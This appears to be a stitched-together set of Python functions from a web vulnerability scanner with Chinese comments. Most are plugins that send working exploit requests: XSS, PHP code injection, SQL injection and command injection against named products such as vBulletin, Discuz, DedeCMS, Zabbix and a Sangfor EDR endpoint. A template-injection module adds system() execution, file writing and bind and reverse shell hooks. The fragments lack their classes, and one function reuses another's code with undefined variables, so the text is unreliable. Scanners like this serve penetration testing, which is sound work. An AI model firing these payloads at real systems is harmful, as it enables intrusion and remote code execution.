def test(self, swf):
req = {
"method": "GET",
# payload : "])}catch(e){if(!window.x){window.x=1;alert("xss")}}
"url": self.url + swf +
"?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}//",
"timeout": 10,
"allow_redirects": False,
"verify": False,
}
r = request(**req)
if r != None and r.status_code == 200:
md5_value = getmd5(r.text)
if md5_value in self.md5_list:
parser_ = response_parser(r)
self.result.append({
"name": self.name,
"url": self.url,
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
def verify(self):
if self.dictdata.get("url").get("extension")[:3] not in ["php", ""]:
return
parser = dictdata_parser(self.dictdata)
params = self.dictdata.get("request").get("params").get("params_url") + \
self.dictdata.get("request").get("params").get("params_body")
num1 = get_random_num(8)
num1_md5 = getmd5(num1)
regx = 'Parse error: syntax error,.*?\sin\s'
payloads = (
"print(md5({}));",
" print(md5({}));",
";print(md5({}));",
"';print(md5({}));$a='",
"\";print(md5({}));$a=\"",
"${{@print(md5({}))}}",
"${{@print(md5({}))}}\\",
"'.print(md5({})).'"
)
if params:
for param in params:
for payload in payloads:
method = "a" if payload[0] == "p" else "w"
payload=payload.format(num1)
req = parser.getreqfromparam(param, text=payload, method=method)
r = request(**req)
if r is not None:
if num1_md5 in r.text:
self.save(r, param, payload)
break
elif re.search(regx, r.text, re.I | re.S):
self.save(r, param, "search rule: " + regx)
break
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
random_int = get_random_num(5)
md5 = getmd5(random_int)
req = {
"method": "POST",
"url": self.url,
"headers": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data": "routestring=ajax/render/widget_php&widgetConfig%5bcode%5d=print(md5({rand}))%3bexit%3b".format(
rand=random_int),
"timeout": 10,
"allow_redirects": False,
"verify": False,
}
r = request(**req)
if r is not None and r.status_code == 200 and md5.encode() in r.content:
parser_ = response_parser(r)
self.result.append({
"name": self.name,
"url": self.url,
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
num = get_random_num(4)
num_md5 = getmd5(num)
req = {
"method": "GET",
"url": self.url + "viewthread.php?tid=10",
# "headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers
"cookies": {
"GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Bsearcharray%5D":
"/.*/eui",
"GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Breplacearray%5D":
"print_r(md5({}))".format(num)
},
"timeout": 10,
"verify": False,
}
r = request(**req)
if r != None and r.status_code == 200 and num_md5[10:20].encode(
) in r.content:
parser_ = response_parser(r)
self.result.append({
"name": self.name,
"url": parser_.geturl(),
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
def is_wildcard_dns(domain, istopdomain=False, level=1):
'''
domain: like baidu.com or www.baidu.com
topdomain: True--> domain is baidu.com,False--> domain is www.baidu.com
return :
True:
False:
None: error
'''
if not istopdomain:
domain = ".".join(domain.split(".")[1:])
if domain == "":
return None #
red = getredis()
key = getmd5(domain)
if red.sismember("dns_wildcard_true", key):
return True
if red.sismember("dns_wildcard_false", key):
return False
try:
r = dns.resolver.Resolver(configure=False)
r.nameservers = others.dns_servers
answers = r.query('myscan-not-%s-test.%s' %
(get_random_str(4).lower(), domain))
ips = ', '.join(sorted([answer.address for answer in answers]))
if level == 1:
wildcard_test('any-sub-to.%s' % domain, istopdomain, 2)
elif level == 2:
red.sadd("dns_wildcard_true", key)
return True
except Exception as e:
red.sadd("dns_wildcard_false", key)
return False
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
random_str = get_random_num(4)
req = {
"method":
"GET",
"url":
self.url +
"tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5"
+ str(random_str) + ";{/dede:field}",
"headers":
self.dictdata.get("request").get("headers"),
"timeout":
10,
"verify":
False,
"allow_redirects":
True
}
r = request(**req)
if r != None and r.status_code == 200 and (getmd5(
str(random_str))[10:20]).encode() in r.content:
parser_ = response_parser(r)
self.result.append({
"name": self.name,
"url": parser_.geturl(),
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
random_int = get_random_num(5)
req = {
"method":
"GET",
"url":
self.url +
"index.php?c=api&m=data2&auth=582f27d140497a9d8f048ca085b111df¶m=action=sql%20sql=%27select%20md5({})%27"
.format(random_int),
"headers":
self.dictdata.get("request").get("headers"),
"timeout":
10,
"allow_redirects":
False,
"verify":
False,
}
r = request(**req)
if r != None and r.status_code == 200 and (
getmd5(random_int)[10:20]).encode() in r.content:
parser_ = response_parser(r)
self.result.append({
"name": self.name,
"url": self.url,
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
num = get_random_num(4)
num_md5 = getmd5(num)
req = {
"method":
"GET",
"url":
self.url +
"jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,md5({})),0)"
.format(num),
"headers":
self.dictdata.get("request").get("headers"), # 主要保留cookie等headers
"timeout":
10,
"verify":
False,
}
r = request(**req)
if r != None and r.status_code == 200 and num_md5[10:20].encode(
) in r.content:
parser_ = response_parser(r)
self.result.append({
"name": self.name,
"url": parser_.geturl(),
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
def is_perfile_doned(self):
'''
return bool
'''
hashstr = getmd5(self.getperfile())[10:20]
if not self.red.sismember(self.keys.get("perfile"), hashstr):
self.red.sadd(self.keys.get("perfile"), hashstr)
return False
return True
def http_md5(self, dictdata):
'''
return bool
'''
method = dictdata.get("request").get("method")
name, value = self.getallargs(dictdata)
if db_set.get("es_uniq"):
hashstr = getmd5(
"{protocol}-{host}-{port}-{method}-{path}-{argsname}".format(argsname="".join(name),
method=method,
**dictdata.get("url")))
else:
hashstr = getmd5(
"{protocol}-{host}-{port}-{method}-{path}-{argsname}-{value}".format(
argsname="".join(name), value="".join(value),
method=method,
**dictdata.get("url")))
return hashstr
def verify(self):
if self.dictdata.get("url").get("extension") in notAcceptedExt:
return
#搜索返回包:
parser = dictdata_parser(self.dictdata)
if self.search(parser.getresponsebody(),
"Null payload , errors in response text "):
return
# pass
# body url参数注入
random_num = get_random_num(8)
random_num_md5 = getmd5(random_num)
payloads = [
('鎈\'"\(', None, "a"),
('"and/**/extractvalue(1,concat(char(126),md5({})))and"'.format(
random_num), random_num_md5, "a"),
("'and/**/extractvalue(1,concat(char(126),md5({})))and'".format(
random_num), random_num_md5, "a"),
("'and(select'1'from/**/cast(md5({})as/**/int))>'0".format(
random_num), random_num_md5, "a"),
('"and(select\'1\'from/**/cast(md5({})as/**/int))>"0'.format(
random_num), random_num_md5, "a"),
("'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','{}')))>'0"
.format(random_num), random_num_md5, "a"),
('"and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes(\'MD5\',\'{}\')))>"0'
.format(random_num), random_num_md5, "a"),
("'and/**/extractvalue(1,concat(char(126),md5({})))and'".format(
random_num), random_num_md5, "a"),
('"and/**/extractvalue(1,concat(char(126),md5({})))and"'.format(
random_num), random_num_md5, "a"),
("/**/and/**/cast(md5('{}')as/**/int)>0".format(random_num),
random_num_md5, "a"),
("convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','{}')))".
format(random_num), random_num_md5, "w"),
("extractvalue(1,concat(char(126),md5({})))".format(random_num),
random_num_md5, "w")
]
params = self.dictdata.get("request").get("params").get("params_url") + \
self.dictdata.get("request").get("params").get("params_body")
if params:
for param in params:
for payload, search_str, method in payloads:
req = parser.getreqfromparam(param, method, payload)
r = request(**req)
if search_str == None:
if self.search(r, payload):
break
# pass
else:
if self.search_md5(r, random_num_md5[10:20], payload):
break
# pass
# cookie注入
pass
def verify(self):
dictdata = self.dictdata
# 把请求体和响应体 base64解码,便于搜索
request_raw = base64.b64decode(self.dictdata.get("request").get("raw").encode("utf8"))
response_raw = base64.b64decode(self.dictdata.get("response").get("raw").encode("utf8"))
dictdata["request"]["raw"] = request_raw.decode("utf-8", errors="ignore")
dictdata["response"]["raw"] = response_raw.decode("utf-8", errors="ignore")
dictdata["request"]["headers"] = str(dictdata["request"]["headers"])
dictdata["response"]["headers"] = str(dictdata["response"]["headers"])
if "others" in dictdata.keys():
del dictdata["others"]
if "filter" in dictdata.keys():
del dictdata["filter"]
dictdata["source"] = "burp"
dictdata["url"]["ip"] = self.getaddr(dictdata.get("url").get("host"))
dictdata["url"]["pathroot"] = "{protocol}://{host}:{port}/".format(**dictdata.get("url"))
if dictdata["url"]["extension"] == "ico":
body = response_raw[int(dictdata.get("response").get("bodyoffset")):]
dictdata["url"]["icon_hash"] = str(mmh3.hash(base64.b64encode(body)))
actions = []
action = {
"_index": "httpinfo",
"_id": self.http_md5(dictdata),
"_source": dictdata
}
actions.append(action)
# get url from html
urls_from_html = self.get_html_url(dictdata["url"]["url"],
response_raw[int(dictdata.get("response").get("bodyoffset")):].decode(
"utf-8",
"ignore"),
dictdata["response"]["mime_inferred"])
logger.debug("urls_from_html total:{}".format(len(urls_from_html)))
if urls_from_html:
mythread(self.getaddr, self.hosts, 50)
for url_data in urls_from_html:
url_data["ip"] = self.dict_host_ip[url_data["host"]]
action_ = {
"_index": "httpinfo",
"_id": getmd5("{ip}{pathroot}{path}".format(**url_data)),
"_source": {"url": url_data,
"source": "html",
"ts": dictdata["ts"]}
}
actions.append(action_)
try:
helpers.bulk(others.es_conn, actions)
logger.debug("es insert {} lines".format(len(actions)))
except Exception as ex:
logger.warning("Plugin {} get error:{}".format(__name__, ex))
traceback.print_exc()
def find_ip(self):
if is_ipaddr(self.domain):
return self.domain
red = getredis()
key = getmd5("domain_to_ip_" + self.domain)
res = red.get(key)
if res:
return res.decode()
mythread(self.query, copy.deepcopy(others.dns_servers), 6)
data = ",".join(list(self.msg))
red.set(key, data)
return data
def args_inject(self, data):
req, payload, search_str, random_num_md5, param = data
param_str = getmd5(str(param))
if param_str in self.found:
return
r = request(**req)
if r is not None:
if search_str == None:
if self.search(r, payload, param.get("name", "")):
self.found.append(param_str)
else:
if self.search_md5(r, random_num_md5[10:20], payload):
self.found.append(param_str)
def output(self, msg, insert=False):
msg = "/".join(self.url.split("/")[:3]) + " " + msg
msgmd5 = getmd5(msg)[10:18]
red = getredis()
if insert == False:
if not red.sismember("myscan_max_output", msgmd5):
return True # 可以输出
else:
# logger.debug("sql boolen moudle : {} 输出个数已达{}上限,不再测试输出".format(msg, self.verify_count))
return False # 不可以继续输出
else:
# red.hincrby("myscan_max_output", msgmd5, amount=1)
red.sadd("myscan_max_output", msgmd5)
def is_perfolder_doned(self):
'''
return list
'''
res = []
folders = self.getperfolders()
if not folders:
return []
for folder in folders:
hashstr = getmd5(folder)[10:20]
if not self.red.sismember(self.keys.get("perfolder"), hashstr):
self.red.sadd(self.keys.get("perfolder"), hashstr)
res.append(folder)
return res
def header_inject(self, data):
req, data_ = data
payload, search_str, k, msg = data_
if self.output(msg):
random_num = get_random_num(8)
random_num_md5 = getmd5(random_num)
r = request(**req)
if r is not None:
if search_str == None:
if self.search(r, payload, "headers's {}".format(k)):
self.output(msg, True)
else:
if self.search_md5(r, random_num_md5[10:20], payload):
self.output(msg, True)
def can_output(self, msg, insert=False):
'''
msg : should url+somename
'''
msgmd5 = getmd5(msg)
red = getredis()
if insert == False:
if not red.sismember("myscan_max_output", msgmd5):
return True # 可以输出
else:
logger.debug("{} 输出个数已达一次,不再测试输出".format(msg))
return False # 不可以继续输出
else:
# red.hincrby("myscan_max_output", msgmd5, amount=1)
red.sadd("myscan_max_output", msgmd5)
def is_perscheme_doned(self):
'''
return bool
'''
method = self.dictdata.get("request").get("method")
urlpath = self.dictdata.get("url").get("path")
host = self.dictdata.get("url").get("host")
protocol = self.dictdata.get("url").get("protocol")
port = self.dictdata.get("url").get("port")
argsname = "".join(self.getallargs())
hashstr = getmd5("{}{}{}{}{}{}".format(protocol, host, port, method,
urlpath, argsname))
if not self.red.sismember(self.keys.get("perscheme"), hashstr):
self.red.sadd(self.keys.get("perscheme"), hashstr)
return False
return True
def getaddr(self, domain):
if is_ipaddr(domain):
self.dict_host_ip[domain] = domain
return domain
key = getmd5("dnsdata_{}".format(domain))
dnsdata = self.red.get(key)
if dnsdata == b"":
self.dict_host_ip[domain] = None
return None
elif dnsdata is not None:
# print("already fuond it {} {}".format(domain,dnsdata))
self.dict_host_ip[domain] = dnsdata.decode()
return dnsdata.decode()
else:
# method 1
# try:
# resolver = dns.resolver.Resolver()
# resolver.timeout = 5
# resolver.lifetime = 5
# A = resolver.query(domain, 'A') # 指定查看类型为A记录
# addrs = []
# for i in A.response.answer:
# for j in i.items: # 遍历回应信息
# if str(j).replace(".", "").isdigit():
# addrs.append(str(j))
# self.dict_host_ip[domain] = addrs[0]
# self.red.set(key, addrs[0])
# return addrs[0]
# except:
# self.dict_host_ip[domain] = None
# self.red.set(key, "")
# return None
# method 2
try:
result = socket.getaddrinfo(domain, None)
domain_ip = result[-1][-1][0]
self.dict_host_ip[domain] = domain_ip
self.red.set(key, domain_ip)
return domain_ip
except Exception as ex:
# traceback.print_exc()
self.dict_host_ip[domain] = None
self.red.set(key, "")
return None
def verify(self):
if self.dictdata.get("url").get("extension").lower() in notAcceptedExt:
return
parser = dictdata_parser(self.dictdata)
params = self.dictdata.get("request").get("params").get("params_url") + \
self.dictdata.get("request").get("params").get("params_body")
num1 = get_random_num(4)
num2 = get_random_num(4)
num1_num2 = num1 + num2
num1num2 = num1 * num2
num1_md5 = getmd5(num1)
payloads = (
{"cmd": "\nexpr {} + {}\n".format(num1, num2), "show": num1_num2, "method": "a"},
{"cmd": "|expr {} + {}".format(num1, num2), "show": num1_num2, "method": "a"},
{"cmd": "$(expr {} + {})".format(num1, num2), "show": num1_num2, "method": "a"},
{"cmd": "&set /A {}+{}".format(num1, num2), "show": num1_num2, "method": "a"},
{"cmd": "${@var_dump(md5(%s))};" % num1, "show": num1_md5, "method": "w"},
{"cmd": "{}*{}" % num1, "show": num1num2, "method": "w"},
{"cmd": "'-var_dump(md5(%s))-'" % num1, "show": num1_md5, "method": "w"},
{"cmd": "/*1*/{{%s+%s}}" % (num1, num2), "show": num1_num2, "method": "w"},
{"cmd": "${%s+%s}" % (num1, num2), "show": num1_num2, "method": "w"},
{"cmd": "${(%s+%s)?c}" % (num1, num2), "show": num1_num2, "method": "w"},
{"cmd": "#set($c=%s+%s)${c}$c" % (num1, num2), "show": num1_num2, "method": "w"},
{"cmd": "<%- {}+{} %>".format(num1, num2), "show": num1_num2, "method": "w"},
)
if params:
for param in params:
for payload in payloads:
req = parser.getreqfromparam(param, text=payload.get("cmd"), method=payload.get("method"))
r = request(**req)
if r != None and str(payload.get("show")) in r.text:
parser_ = response_parser(r)
self.result.append({
"name": self.name,
"url": parser_.geturl(),
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"param": param.get("name"),
"payload": payload,
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
break
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
random_s = get_random_str(6)
req = {
"method":
"POST",
"url":
self.url +
"api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9",
# "headers": headers, # 主要保留cookie等headers
"headers":
self.dictdata.get("request").get("headers"), # 主要保留cookie等headers
"timeout":
10,
"data":
r'''{"params":"w=123\"'1234123'\"|echo -n %s |md5sum"}''' %
(random_s),
"allow_redirects":
False,
"verify":
False,
}
r = request(**req)
if r is not None and getmd5(random_s).encode() in r.content:
parser_ = response_parser(r)
self.result.append({
"name": self.name,
"url": self.url,
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
def is_cdn_domain(domain):
'''
return True ,False
'''
red = getredis()
key = getmd5(domain)
if red.sismember("domain_cdn_true", key):
return True
if red.sismember("domain_cdn_false", key):
return False
try:
r = dns.resolver.Resolver(configure=False)
r.nameservers = others.dns_servers
answers = r.query('myscan-not-%s-test.%s' %
(get_random_str(4).lower(), domain))
ips = ', '.join(sorted([answer.address for answer in answers]))
if level == 1:
wildcard_test('any-sub-to.%s' % domain, istopdomain, 2)
elif level == 2:
red.sadd("dns_wildcard_true", key)
return True
except Exception as e:
red.sadd("dns_wildcard_false", key)
return False
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
num = get_random_num(4)
num_md5 = getmd5(num)
req = {
"method":
"GET",
"url":
self.url +
"faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(user,0x3a,md5({}),0x3a)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23"
.format(num),
# "headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers
"timeout":
10,
"allow_redirects":
False,
"verify":
False,
}
r = request(**req)
if r != None and r.status_code == 200 and num_md5[10:20].encode(
) in r.content:
parser_ = response_parser(r)
self.result.append({
"name": self.name,
"url": parser_.geturl(),
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
def language_init(self):
self.update_actions({
'render': {
'call': 'inject',
'render': """%(code)s""",
'header': """print_r('%(header)s');""",
'trailer': """print_r('%(trailer)s');""",
'test_render': 'print(md5(%(r1)s));' % {
'r1': rand.randints[0]
},
'test_render_expected': '%(r1)s' % {
'r1': getmd5(rand.randints[0])[0:10]
}
},
'write': {
'call': 'evaluate',
'write':
"""$d="%(chunk_b64)s"; file_put_contents("%(path)s", base64_decode(str_pad(strtr($d, '-_', '+/'), strlen($d)%%4,'=',STR_PAD_RIGHT)),FILE_APPEND);""",
'truncate': """file_put_contents("%(path)s", "");"""
},
'read': {
'call': 'evaluate',
'read':
"""print(base64_encode(file_get_contents("%(path)s")));"""
},
'md5': {
'call': 'evaluate',
'md5':
"""is_file("%(path)s") && print(md5_file("%(path)s"));"""
},
'evaluate': {
'call': 'render',
'evaluate': """%(code)s""",
'test_os': 'echo PHP_OS;',
'test_os_expected': '^[\w-]+$'
},
'execute': {
'call': 'evaluate',
'execute':
"""$d="%(code_b64)s";system(base64_decode(str_pad(strtr($d,'-_','+/'),strlen($d)%%4,'=',STR_PAD_RIGHT)));""",
'test_cmd': bash.echo % {
's1': rand.randstrings[2]
},
'test_cmd_expected': rand.randstrings[2]
},
'blind': {
'call': 'evaluate_blind',
'test_bool_true': """True""",
'test_bool_false': """False"""
},
'evaluate_blind': {
'call':
'inject',
'evaluate_blind':
"""$d="%(code_b64)s";eval("return (" . base64_decode(str_pad(strtr($d, '-_', '+/'), strlen($d)%%4,'=',STR_PAD_RIGHT)) . ") && sleep(%(delay)i);");"""
},
'execute_blind': {
'call':
'inject',
'execute_blind':
"""$d="%(code_b64)s";system(base64_decode(str_pad(strtr($d, '-_', '+/'), strlen($d)%%4,'=',STR_PAD_RIGHT)). " && sleep %(delay)i");"""
},
'bind_shell': {
'call': 'execute_blind',
'bind_shell': bash.bind_shell
},
'reverse_shell': {
'call': 'execute_blind',
'reverse_shell': bash.reverse_shell
},
})
self.set_contexts([
# Text context, no closures
{
'level': 0
},
# This terminates the statement with ;
{
'level': 1,
'prefix': '%(closure)s;',
'suffix': '//',
'closures': ctx_closures
},
# This does not need termination e.g. if(%s) {}
{
'level': 2,
'prefix': '%(closure)s',
'suffix': '//',
'closures': ctx_closures
},
# Comment blocks
{
'level': 5,
'prefix': '*/',
'suffix': '/*'
},
])
def verify(self):
if self.dictdata.get("url").get("extension").lower() in notAcceptedExt:
return
# 搜索返回包:
self.parser = dictdata_parser(self.dictdata)
# 黑名单
# tomcat
if self.dictdata.get("url").get("path").startswith(
"/examples/") or self.dictdata.get("url").get(
"path").startswith("/docs/"):
return
# body url参数注入
random_num = get_random_num(8)
random_num_md5 = getmd5(random_num)
payloads = [
('"and/**/extractvalue(1,concat(char(126),md5({})))and"'.format(
random_num), random_num_md5, "a"),
("'and/**/extractvalue(1,concat(char(126),md5({})))and'".format(
random_num), random_num_md5, "a"),
("'and(select'1'from/**/cast(md5({})as/**/int))>'0".format(
random_num), random_num_md5, "a"),
('"and(select\'1\'from/**/cast(md5({})as/**/int))>"0'.format(
random_num), random_num_md5, "a"),
("'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','{}')))>'0"
.format(random_num), random_num_md5, "a"),
('"and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes(\'MD5\',\'{}\')))>"0'
.format(random_num), random_num_md5, "a"),
("'and/**/extractvalue(1,concat(char(126),md5({})))and'".format(
random_num), random_num_md5, "a"),
('"and/**/extractvalue(1,concat(char(126),md5({})))and"'.format(
random_num), random_num_md5, "a"),
("/**/and/**/cast(md5('{}')as/**/int)>0".format(random_num),
random_num_md5, "a"),
("convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','{}')))".
format(random_num), random_num_md5, "w"),
("extractvalue(1,concat(char(126),md5({})))".format(random_num),
random_num_md5, "w")
]
params = self.dictdata.get("request").get("params").get("params_url") + \
self.dictdata.get("request").get("params").get("params_body")
reqs = []
if params:
for param in params:
for payload, search_str, method in [('鎈\'"\(', None, "a")
] + payloads:
req = self.parser.getreqfromparam(param, method, payload)
reqs.append(
(req, payload, search_str, random_num_md5, param))
mythread(self.args_inject, reqs, cmd_line_options.threads)
# header注入
if not plugin_set.get("sqli").get("header_inject"):
return
header_msg = {
"User-Agent": {
"msg":
"sqli_error_ua",
"default":
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36"
},
"Referer": {
"msg": "sqli_error_referer",
"default": "https://www.qq.com/search"
},
"X-Forwarded-For": {
"msg": "sqli_error_xff",
"default": "12.40.9.144"
},
"Real-Ip": {
"msg": "sqli_error_ri",
"default": "2.40.9.144"
},
"X-Forwarded-Host": {
"msg": "sqli_error_xfh",
"default": "2.40.9.144"
},
}
reqs = []
for k, v in header_msg.items():
if self.output(v.get("msg")):
logger.debug("start {} inject ".format(k))
headers = copy.deepcopy(
self.dictdata.get("request").get("headers"))
if k not in headers.keys():
headers[k] = v.get("default")
for payload, search_str, method in [('\'"\(', None, "a")
] + payloads:
headers_withpayload = copy.deepcopy(headers)
headers_withpayload[k] = headers_withpayload[
k] + payload if method == "a" else payload
req = self.parser.generaterequest(
{"headers": headers_withpayload})
reqs.append((req, (payload, search_str, k, v.get("msg"))))
mythread(self.header_inject, reqs, cmd_line_options.threads)
